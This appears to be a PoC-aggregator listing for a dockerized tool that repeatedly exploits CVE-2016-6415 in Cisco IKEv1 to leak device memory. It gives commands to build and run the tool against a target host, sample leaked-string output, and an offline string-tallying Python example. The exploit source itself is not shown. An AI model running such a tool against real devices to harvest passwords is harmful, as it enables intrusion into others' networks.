Related vulnerability
Title:
Information disclosure vulnerability in multiple Cisco products
(CVE-2016-6415)
Description: Cisco IOS and related products are operating systems developed by Cisco (USA). The server-side IKEv1 implementation in multiple Cisco products contains an information disclosure vulnerability. A remote attacker can exploit it by sending a Security Association negotiation request and obtain sensitive information from device memory. The following products and versions are affected: Cisco IOS 12.2 through 12.4 and 15.0 through 15.6; IOS XE 3.18S; IOS XR 4.3.x and 5.0.x through 5.2.x; PIX versions prior to 7.0.
Description
Re-implementation of VirtueSecurity's benigncertain-monitor
Introduction
# CVE-2016-6415-BenignCertain-Monitor
Re-implementation of VirtueSecurity's benigncertain-monitor. Doesn't have all the same payload options as the original, but replaces the `bc-id` binary with a better proof of concept by Ross Bradley that can be expanded on if necessary.
## Credits:
- Original monitor written and maintained by VirtueSecurity at https://github.com/VirtueSecurity/benigncertain-monitor
- Proof of concept script used to replace the buggy "bc-id" binary is from Ross Bradley at https://github.com/ross-bradley/benign-certain
```
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
```
The service will continuously poll the vulnerable service, extract ASCII strings from the leaked memory, store the strings in a local SQLite database, and show the most frequently observed strings:
```
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
```
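The post-processing pipeline described above (extract printable ASCII strings from a leaked buffer, tally them in SQLite across repeated samples, report the most frequent) as an added example; this is not the project's own `benign.py`, and it does no network polling at all: the `SAMPLES` buffers are constructed in-memory stand-ins for captured memory chunks, which is also how a responder would use such a routine offline to assess what an already-captured sample exposes. The `min_len` threshold, table layout and function names are assumptions.

```python
import re
import sqlite3

# Constructed stand-ins for three successive leaked memory chunks (not real device data).
# Stable contents recur across samples; transient bytes do not.
SAMPLES = [
    b"\x00\x01\x02cisco-secret-psk\x00\xff\x10ab\x00\x05\x06 hostname rtr1\x00\x0b",
    b"\x00\xfecisco-secret-psk\x00\x00\x02\x17username admin\x00\x0c",
    b"\x7f\x00cisco-secret-psk\x00\x03 hostname rtr1\x00\x0a\x0d",
]


def extract_strings(buf: bytes, min_len: int = 4) -> list[str]:
    """Return every run of at least min_len printable ASCII bytes (0x20-0x7e), in order.

    Same idea as the classic `strings` utility; 0x7f (DEL) and control bytes end a run.
    """
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(buf)]


def open_db(path: str = ":memory:") -> sqlite3.Connection:
    """Open (or create) the tally database. One row per distinct string."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS observed ("
        "  string TEXT PRIMARY KEY,"
        "  count  INTEGER NOT NULL DEFAULT 0)"
    )
    return conn


def record_sample(conn: sqlite3.Connection, buf: bytes, min_len: int = 4) -> int:
    """Extract strings from one sample and bump each one's counter. Returns strings found."""
    strings = extract_strings(buf, min_len)
    with conn:  # one transaction per sample
        for s in strings:
            # INSERT OR IGNORE + UPDATE avoids relying on SQLite's newer UPSERT syntax.
            conn.execute("INSERT OR IGNORE INTO observed(string, count) VALUES (?, 0)", (s,))
            conn.execute("UPDATE observed SET count = count + 1 WHERE string = ?", (s,))
    return len(strings)


def top_strings(conn: sqlite3.Connection, limit: int = 10) -> list[tuple[str, int]]:
    """Most frequently observed strings first; ties broken alphabetically for stable output."""
    rows = conn.execute(
        "SELECT string, count FROM observed ORDER BY count DESC, string ASC LIMIT ?",
        (limit,),
    )
    return [(s, c) for s, c in rows]


def run_monitor(samples: list[bytes], min_len: int = 4, limit: int = 10) -> list[tuple[str, int]]:
    """Feed every sample through the tally and return the ranked result."""
    conn = open_db()
    for buf in samples:
        record_sample(conn, buf, min_len)
    result = top_strings(conn, limit)
    conn.close()
    return result


if __name__ == "__main__":
    print("string count")
    for i, (s, c) in enumerate(run_monitor(SAMPLES)):
        print(f"{i} {s!r} {c}")
```

Strings that recur across many samples are the ones sitting in long-lived memory (configuration, keys, hostnames), which is why the ranking, not any single sample, is what tells you how much a leak of this kind exposes.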
## Overview
This is a dockerized Python script that continuously leaks memory of a target vulnerable to the NSA BENIGNCERTAIN Cisco exploit, CVE-2016-6415.
The script polls the vulnerable service over time to identify probable passwords and other potentially sensitive information. This can be used to harvest actionable data over a period of time rather than just a proof of concept exploit.
## TODO:
- [ ] Port exploit code to python3
- [ ] Expand arguments to passthru from the container to the exploit script for better option tweaking
- [ ] Optional: Expand payload options
File snapshot
[4.0K] /data/pocs/6291ae7cac096c69db91068a55b951cf738108d1
├── [4.0K] benigncertain
│ └── [1.8K] benign.py
├── [ 178] Dockerfile
├── [ 158] entry.sh
├── [1.4K] poc.py
├── [1.8K] README.md
└── [ 6] requirements.txt
1 directory, 6 files
Notes
1. Accessing the original source is recommended.
2. If the source is no longer available or cannot be accessed, email f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 (Shenlong) has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.